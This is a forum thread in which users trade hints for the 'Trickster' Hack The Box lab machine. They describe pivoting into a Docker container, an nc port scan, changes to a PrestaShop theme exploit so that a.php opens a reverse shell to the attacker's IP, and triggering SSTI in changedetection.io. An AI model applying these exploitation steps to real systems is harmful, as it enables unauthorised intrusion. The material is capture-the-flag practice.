Posts: 18
Threads: 0
Joined: Aug 2024
(Sep 22, 2024, 04:35 AM)maggi Wrote: (Sep 22, 2024, 04:13 AM)Detector6 Wrote: (Sep 21, 2024, 11:30 PM)wtfduw Wrote: sure. my pleasure
As for root, port 5000 is exposed for docker 172.17.0.2
it has changedetection.io installed, tried a couple of exploits but nothing. Anyone got anything?
That is a good find, nice one. netstat and ss didn't show anything as user james, how did you find the ip and port 5000?
ligolo-ng to get at the container
Then nmap the 172 subnet? I guess Chisel would work here as well.
Thanks!
Posts: 32
Threads: 0
Joined: Jul 2023
(Sep 22, 2024, 04:51 AM)mascon Wrote: Can someone explain how did you find the ip and port?
You can see docker running (like in the ps output), then you check the interface for the IP and find 172.17.0.1.
Either use nmap or ping + nc to find the IP of the container and the port This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Posts: 148
Threads: 2
Joined: Oct 2023
(Sep 22, 2024, 04:51 AM)mascon Wrote: Can someone explain how did you find the ip and port? Ping sweeping. You can see even with `ip a` or `ifconfig` the docker that there's something off.
Linpeas and pspy64 also you could see related to changedetection io website. Then you can investigate.
Also, let's not forget the name of this box, we all got tricked, by the docker, by the freaking slicer, and the badly written POC for foothold etc.
Then again, probably box was changed during approval/publish/etc, since adam should be the the intended path, prunaslicer can be run with sudo, so yeah. James > lateral to Adam > root.
It also doesn't make a sense leaving the root pwd accidentally in the bash history which match also adam's creds not just the host.
And this cred should have been found from the backup zip from datastores I'd say... not the history.
But this time, the name checks out - trickster.
Posts: 124
Threads: 1
Joined: Apr 2024
Sep 22, 2024, 08:57 AM
(This post was last modified: Sep 22, 2024, 09:16 AM by jsvensson.)
Ach i can't get shell to docker, using notifications nothing works even added login to exploit.
Finally got it 
Posts: 10
Threads: 0
Joined: Sep 2024
(Sep 22, 2024, 08:57 AM)jsvensson Wrote: Ach i can't get shell to docker, using notifications nothing works even added login to exploit.
To get shell on docker you need to use correct `notification url` like `get://SERVER` (gets didnt work). I think only criteria is that server has to be accessible and also change reddit urls to something accessible on network. After adding watcher update server with new file and that should trigger the SSTI. (If it doesn't you can manually do it)
Notification url formats are found in watcher instance tabs.
Posts: 41
Threads: 2
Joined: Sep 2023
(Sep 21, 2024, 10:35 PM)a44857437 Wrote: (Sep 21, 2024, 10:17 PM)nomx1337 Wrote: Were you able to crack adams hash?
I cracked james' hash from the database
(Sep 21, 2024, 10:32 PM)jsvensson Wrote: for POC
there is a couple of things to change:
in zip you have a.php - need a change to yours ip to get shell - but this file must be in zip
in exploit.py - change name of shell.php to /themes/next/a.php
in exploit html:
all admin-dev to admin634ewutrx1jgitlooaj
and in import_theme to yours_ip
I had to change the call to reverse_shell.php in exploit.html to a.php as well
(or you can add the modified reverse_shell.php to the zip)
no need to modify reverse_shell.php actually, just modify a.php inside zip
Posts: 124
Threads: 1
Joined: Apr 2024
(Sep 22, 2024, 09:14 AM)idontevensmokebro Wrote: (Sep 22, 2024, 08:57 AM)jsvensson Wrote: Ach i can't get shell to docker, using notifications nothing works even added login to exploit.
To get shell on docker you need to use correct `notification url` like `get://SERVER` (gets didnt work). I think only criteria is that server has to be accessible and also change reddit urls to something accessible on network. After adding watcher update server with new file and that should trigger the SSTI. (If it doesn't you can manually do it)
Notification url formats are found in watcher instance tabs.
I had to manually trigger notification and then it worked
Posts: 41
Threads: 4
Joined: Sep 2024
guys, how did you find the port 5000 is open? This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming | https://breachforums.ai/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 32
Threads: 0
Joined: Jul 2023
(Sep 22, 2024, 10:28 AM)mrdot457 Wrote: guys, how did you find the port 5000 is open?
nc -zv 172.17.0.2 1-10000 2>&1 | grep -v "Connection refused"
Connection to 172.17.0.2 5000 port [tcp/*] succeeded!
This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Posts: 13
Threads: 2
Joined: Aug 2024
(Sep 21, 2024, 11:58 PM)Str4ngerX Wrote: (Sep 21, 2024, 10:32 PM)jsvensson Wrote: for POC
there is a couple of things to change:
in zip you have a.php - need a change to yours ip to get shell - but this file must be in zip
in exploit.py - change name of shell.php to /themes/next/a.php
in exploit html:
all admin-dev to admin634ewutrx1jgitlooaj
and in import_theme to yours_ip
I'm still unable to get this working, I'm not able to GET http://shop.trickster.htb/themes/next/a.php, it says forbidden.
I have a.php exploit.html exploit.py ps_next_8_theme_malicious.zip (i've added my ip to a.php inside the zip)
I've made the right modifications but still nothing can't GET that a.php, I'm recieving GET requests at my hosted python web server and it's GETing that zip file successfully.
Any help please?
|
